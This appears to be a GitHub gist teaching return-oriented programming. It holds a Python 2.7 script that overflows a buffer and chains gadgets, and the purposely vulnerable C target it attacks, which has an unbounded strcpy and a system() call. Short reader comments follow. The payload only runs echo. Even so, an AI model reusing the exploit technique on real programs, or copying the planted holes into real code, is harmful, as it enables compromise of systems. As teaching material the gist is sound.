Simple ROP Exploit Example (x86)
# NOTE: For Python 2.7 | |
import os | |
import struct | |
#Find gadgets | |
pop_ret = 0x08049ca5 # start address of a pop,ret sequence | |
pop_pop_ret = 0x08049ca4 # start address of a pop,pop,ret sequence | |
lazy = 0x08049b05 # objdump -d | grep lazy | |
food = 0x08049b30 # objdump -d | grep food | |
feeling_sick = 0x08049b92 # objdump -d | grep feeling_sick | |
#Buffer Overflow | |
payload = "A"*0x6c | |
payload += "BBBB" | |
#food(0xdeadbeef) gadget | |
payload += struct.pack("I", food) | |
payload += struct.pack("I", pop_ret) | |
payload += struct.pack("I", 0xdeadbeef) | |
#feeling_sick(0xd15ea5e, 0x0badf00d) gadget | |
payload += struct.pack("I", feeling_sick) | |
payload += struct.pack("I", pop_pop_ret) | |
payload += struct.pack("I", 0xd15ea5e) | |
payload += struct.pack("I", 0x0badf00d) | |
payload += struct.pack("I", lazy) | |
os.system("./simple-rop \"%s\"" % payload) |
#include <stdio.h> | |
#include <string.h> | |
#include <stdlib.h> | |
char string[100]; | |
// I might need this later. ¯\_(ツ)_/¯ | |
// I'm not using it so it shouldn't affect anything. | |
void lazy() { | |
system(string); | |
} | |
void food(int magic) { | |
printf("THANK YOU!\n"); | |
if (magic == 0xdeadbeef) { | |
strcat(string, "/bin"); | |
} | |
} | |
void feeling_sick(int magic1, int magic2) { | |
printf("1m f33ling s1cK...\n"); | |
if (magic1 == 0xd15ea5e && magic2 == 0x0badf00d) { | |
strcat(string, "/echo 'This message will self destruct in 30 seconds...BOOM!'"); | |
} | |
} | |
void vuln(char *string) { | |
char buffer[100] = {0}; | |
strcpy(buffer, string); // I don't know any better. | |
} | |
int main(int argc, char** argv) { | |
string[0] = 0; | |
printf("m3 hUN6rY...cAn 1 haZ 5H3ll?! f33d mE s0m3 beef\n\n"); | |
if (argc > 1) { | |
vuln(argv[1]); | |
} else { | |
printf("y0u f0rG0T t0 f33d mE!!!\n"); | |
} | |
return 0; | |
} |
This comment has been minimized.
This comment has been minimized.
You'll probably have to change the hardcoded addresses of the gadgets. |
This comment has been minimized.
This comment has been minimized.
Should I just set pop_ret to the start of the overflow? like the first appearence of "BBBB" or after it |
This comment has been minimized.
This comment has been minimized.
You should set |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
This comment has been minimized.
it created a segmenttion fault. what i have to change?